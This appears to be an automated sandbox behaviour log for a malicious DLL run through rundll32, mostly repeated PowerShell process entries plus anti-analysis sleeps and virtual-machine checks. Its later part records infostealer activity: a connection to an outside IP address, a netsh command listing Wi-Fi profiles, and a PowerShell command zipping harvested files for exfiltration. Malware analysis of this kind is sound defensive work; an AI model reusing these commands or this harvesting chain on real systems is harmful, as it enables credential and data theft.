    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8454
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1115
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8379
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1236
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5752
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1994
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360 Thread sleep count: 8454 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020 Thread sleep count: 1115 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200 Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204 Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424 Thread sleep count: 5752 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep count: 1994 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Windows\System32\loaddll32.exe Thread delayed: delay time: 120000
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW$D
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8O
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1924040267.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.000000000343D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: netsh.exe, 00000005.00000002.1731533216.000000000141A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1731513760.0000000000701000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: netsh.exe, 00000010.00000002.1793036288.00000000013EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.215.113.217 80
    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB.docx VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\Desktop\YPSIACHYXW.xlsx VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
    Source: C:\Windows\SysWOW64\netsh.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
